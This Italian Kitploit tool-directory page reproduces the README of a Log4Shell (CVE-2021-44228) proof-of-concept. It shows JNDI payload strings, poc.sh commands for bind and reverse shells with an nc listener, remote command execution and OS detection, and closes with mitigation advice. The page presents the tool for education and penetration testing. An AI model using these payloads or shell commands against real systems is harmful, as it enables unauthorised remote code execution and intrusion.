Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/thearqsz/cve-2021-44228-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Exploit proof-of-concept per CVE-2021-44228 (Log4Shell) con server HTTP e LDAP, che supporta reverse/bind shell, RCE e rilevamento basato sul tempo per uso didattico.

Vedi Repository
24 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228 PoC

PoC per CVE-2021-44228.

Progetto realizzato SOLO PER SCOPI EDUCATIVI.

Server exploit

Questo progetto crea due server: http e ldap. Entrambi sono necessari affinché l'exploit funzioni. Il file java specificato viene compilato e i server vengono avviati in un Dockerfile. Il payload viene mostrato all'utente - deve essere passato all'applicazione vulnerabile.

Esempio di payload:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

Come eseguire?

  • Bind shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Reverse shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Rilevamento di vulnerabilità basato sul tempo

Mette in pausa il programma per 25 secondi

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • Rilevamento del sistema operativo
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

Il rilevamento del SO può restituire 4 lettere:

  • L per Linux
  • W per Windows
  • M per MacOS
  • U per sconosciuto

Bypass

La tecnica di bypass è stata pubblicata. Esempio qui

Applicazione vulnerabile

L'app è stata progettata per mostrare come funziona. Per costruire ed eseguire il jar con un'app usa:

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

dove PAYLOAD è restituito dallo script ./poc.sh (ad es. ${jndi:ldap://127.0.0.1:1389/1}).

Crediti

Alcuni crediti per progetti e siti web utilizzati durante la creazione di questo exploit:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

Come proteggersi?

Avvia l'app usando log4j con log4j2.formatMsgNoLookups impostato su true, o aggiorna a log4j-2.15.0-rc1 o successivo. Gli aggiornamenti sono disponibili - implementali il prima possibile.

Dichiarazione di non responsabilità

Questo progetto può essere utilizzato solo per scopi educativi. L'utilizzo di questo software contro sistemi target senza autorizzazione preventiva è illegale, e l'autore non si assumerà alcuna responsabilità per eventuali danni derivanti dall'abuso di questo software.

Scarica lo strumento